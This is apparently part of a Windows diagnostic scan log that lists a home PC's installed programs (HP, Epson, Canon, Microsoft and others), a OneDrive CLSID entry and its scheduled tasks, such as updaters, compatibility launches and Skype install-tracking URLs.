Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{68D27126-BF6A-457D-8DD0-5F35E8D41310}) (Version: 1.3.1.21 - Canon)
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001EB665-D9EC-415E-9E13-AD2125B2B992}) (Version: 2.1 - Canon)
Canon Utilities PhotoStitch 3.1 (HKLM-x32\...\InstallShield_{218BBBE3-FE63-4BB2-81A8-7435575A84FA}) (Version: 3.1.14 - Canon)
Canon ZoomBrowser EX (HKLM-x32\...\{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}) (Version: 5.02.0100 - Canon)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.3.0.5014 - Citrix Systems, Inc.)
Common System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version:  - )
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ENE CIR Receiver Driver (HKLM\...\FFE7D41DF3C645075BB149E21988B63996C34187) (Version: 2.7.4.0 - ENE)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.81.0000 - Seiko Epson Corporation)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson FAX Utility (HKLM-x32\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 2.00.00 - Seiko Epson Corporation)
Epson PC-FAX Driver (HKLM-x32\...\EPSON PC-FAX Driver 2) (Version:  - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 2.30.00 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
EPSON WF-3620 Series Printer Uninstall (HKLM\...\EPSON WF-3620 Series) (Version:  - SEIKO EPSON Corporation)
Epson WF-3620 User’s Guide version 1.0 (HKLM-x32\...\UsersGuideEpson WF-3620 User’s Guide_is1) (Version: 1.0 - )
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
Facebook Plug-In (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Facebook Plug-In) (Version:  - Facebook, Inc.)
FileHippo.com Update Checker (HKLM-x32\...\FileHippo.com) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
Homepage Protection (HKLM-x32\...\Homepage Protection) (Version:  - AOL Products)
HouseCall for Home Networks (HKLM\...\DRScanner) (Version: 2.1.1183 - Trend Micro Inc.)
HP 3D DriveGuard (HKLM\...\{85A42FF0-F0D0-44A3-B226-C124D6E8B1D5}) (Version: 4.0.3.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9602 - Broadcom Corporation)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart Internet TV (HKLM-x32\...\InstallShield_{E553760D-D7F7-48BF-BD8B-C7E23BA04CB5}) (Version: 3.0.1916 - Hewlett-Packard)
HP MediaSmart Live TV (HKLM-x32\...\InstallShield_{67626E09-5366-4480-8F1E-93FADF50CA15}) (Version: 3.0.1924 - Hewlett-Packard)
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart SlingPlayer (HKLM-x32\...\{90F6051D-A69F-4159-9203-7E20430E1056}) (Version: 2.1.1.60 - Sling Media, Inc.)
HP MediaSmart SmartMenu (HKLM\...\{88E60521-1E4E-4785-B9F1-1798A4BD0C30}) (Version: 3.0.30.1 - Hewlett-Packard)
HP MediaSmart Software Notebook Demo (HKLM-x32\...\{82A213BD-B6AA-4281-A2D3-59D51893CC56}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.1913 - Hewlett-Packard)
HP Quick Launch Buttons (HKLM-x32\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.12.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.3.50.9 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.5.32.203 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP User Guides 0154 (HKLM-x32\...\{B51605BF-6326-4553-AE96-6D7F1813D5F5}) (Version: 1.01.0001 - Hewlett-Packard)
HP Wireless Assistant (HKLM-x32\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6230.0 - IDT)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1883 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 15.0.0.740 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 15.0.0.740 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1913 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1913 - CyberLink Corp.) Hidden
Libronix Digital Library System (HKLM-x32\...\Libronix DLS) (Version:  - Libronix Corporation)
Libronix Digital Library System (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Libronix DLS Application (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
LibronixUpdate (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{7EACD74C-147F-478C-9389-F9F52EE3C88A}) (Version: 1.18.10.2 - LightScribe)
LLS Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Logos Bible Software (HKLM-x32\...\{4331D6C3-912C-4015-9E2E-8149CF4AD56D}) (Version: 6.48.56 - Faithlife Corporation)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.1.94 - LSI Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Medical Office Simulation Software (MOSS) (HKLM-x32\...\ODEUNST #1) (Version:  - )
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Access 2000 Runtime (HKLM-x32\...\{00180409-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.2729 - Microsoft Corporation)
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.560.0 - Microsoft Live Search Toolbar)
Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MovieEdit Task (x32 Version: 1.3.1.21 - Canon) Hidden
Mozilla Firefox 52.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 en-US)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2.6291 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OEB Resource Driver (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.3.0.5014 - Citrix Systems, Inc.) Hidden
Panda ActiveScan 2.0 (HKLM-x32\...\ActiveScan 2.0) (Version: 01.04.01.0014 - Panda Security)
PDF Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Photo Story 3 for Windows (HKLM-x32\...\{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}) (Version: 3.0.1115.11 - Microsoft Corporation)
PhotoStitch (x32 Version: 3.1.14 - Canon) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (x32 Version: 5.5.1923 - CyberLink Corp.) Hidden
QLBCASL (x32 Version: 6.40.17.2 - Hewlett-Packard) Hidden
RAW Image Task 2.1 (x32 Version: 2.1 - Canon) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0007 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30094 - Realtek Semiconductor Corp.)
RogueKiller version 12.10.4.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.10.4.0 - Adlice Software)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Self-service Plug-in (x32 Version: 4.3.0.8352 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlingBoxWatchYourTVAnyWhere (HKLM-x32\...\{4313E16C-811B-469F-8815-6EB98085F8B2}) (Version: 2.1.1.58 - Sling Media)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.) Hidden
Snapshot Viewer 9.0 (HKLM-x32\...\Snapshot Viewer 9.0) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
Understanding Health Insurance: A Guide to Billing and Reimburs (HKLM-x32\...\Understanding Health Insurance: A Guide to Billi~35254FEE_is1) (Version:  - Cengage Learning)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Live OneCare safety scanner (HKLM-x32\...\Windows Live OneCare safety scanner) (Version:  - Microsoft Corporation)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - CACE Technologies)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64\FileCoAuthLib64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04D9E3C8-0160-4165-B472-9D7D5DDC7153} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-07-23] (CyberLink)
Task: {0EB76CE7-2869-4A59-98FE-BECC7963152F} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
Task: {1653F1CF-6E42-4A57-B1F3-2331E782F7DF} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {25329AA8-56DA-47A3-A214-CD57C79EE3BB} - System32\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {2F9F7F2B-9DE0-4FD3-9DD3-D5256B0C4963} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {3477DA62-7A69-452C-85C6-51B4223BF80D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {35A45B35-0D28-49CD-B470-428AAE2985FA} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)
Task: {36B8DCAF-7E99-45E8-8CB2-EBF259655B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {3F69496D-562A-4057-BF8D-BE72210FDF44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-03-10] (HP Inc.)
Task: {461E1321-EAD9-47CE-9655-A44155D9562E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {463B4B29-6E00-4416-A6C2-F5518E018A06} - System32\Tasks\CapSvcInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSvcInst.exe [2009-07-24] (CL)
Task: {4CA243C2-0C39-4E77-A907-68E5E9F001E7} - System32\Tasks\HP AR Program Upload - d4c224df55a54f048e6f468e17db3cda9ee5115ba9824a6aaa2ad50f2d58ff76 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {4FB04482-F787-40D0-9378-7C45FCCE4ABF} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {753E9114-0543-448A-9672-9E287DB4FA66} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {78667CB8-13B8-4CD5-B743-C86376C5B946} - System32\Tasks\TVAgent => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe [2009-07-24] (CyberLink Corp.)
Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsInstall&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
Task: {7CEFAF45-0BAB-4607-AC88-18BAE86BCB6A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7D6798B1-B1DF-4CBC-9367-7625DBE4C791} - System32\Tasks\{286CA1FA-44BE-4DAE-BD48-109C0D949B7C} => pcalua.exe -a "C:\Program Files (x86)\Administrative Medical Assisting\Fordney.exe" -d "C:\Program Files (x86)\Administrative Medical Assisting"
Task: {80647583-FC87-458C-A9A4-39DA4906BD90} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {8153CE22-9583-4852-B540-A11AC6873ECC} - System32\Tasks\HP AR Program Upload - 32facac8e4824c6b8de49339b4a017b6fdc9427e5dc9450d9173ed4d1f36a800 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsPlugin&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
Task: {855253AF-2866-4F9C-8CE0-9A0D144A0C17} - System32\Tasks\{50EF73A5-0164-4666-9D2A-362272AD6E5A} => pcalua.exe -a C:\Users\KEKLR\Desktop\HijackThis.exe -d C:\Users\KEKLR\Desktop
Task: {878A2D8B-887B-41B4-AD83-93D5BEE68755} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {8B0F422D-77F6-4C05-A968-99C5CD3225E9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {948B8490-55F2-4AB3-A5AE-15F63AA9A2D3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {9B2A54DA-C3A9-4829-A9E5-B33271C40E76} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-07-23] (CyberLink Corp.)
Task: {AF2F0692-3E07-4F91-87AE-683E3C6DB159} - System32\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {B6D0E72C-8127-428D-80D2-BAA383300CC4} - System32\Tasks\CapSchedInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSchedInst.exe [2009-07-24] (CL)
Task: {B7F9420F-324E-4023-AC78-FC12672E5FC5} - System32\Tasks\HPCeeScheduleForKEKLR => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {C2B2C745-6D3C-4382-8A7A-A99C23903026} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-03-24] (HP Inc.)
Task: {C9A7933D-8FBB-431A-A7A3-494F7DB92609} - System32\Tasks\{E7EAECF8-C12C-48F3-A224-0E1E8217794D} => pcalua.exe -a C:\HJT\HijackThis.exe -d C:\HJT
Task: {D34DA717-71B8-45BD-9EF4-ECE24ECC4A8F} - System32\Tasks\HP AR Program Upload - c12c17c4f19f48a296a0aa8bf65f83c9246d63c68c0b4888986ace00978760d6 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {DAC5341D-288C-497E-87A6-E5B0A7BB636D} - System32\Tasks\CapUninst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapUninst.exe [2009-07-24] (CL)
Task: {E249B004-6E71-428A-B8C6-D6B544BF9CDE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated)
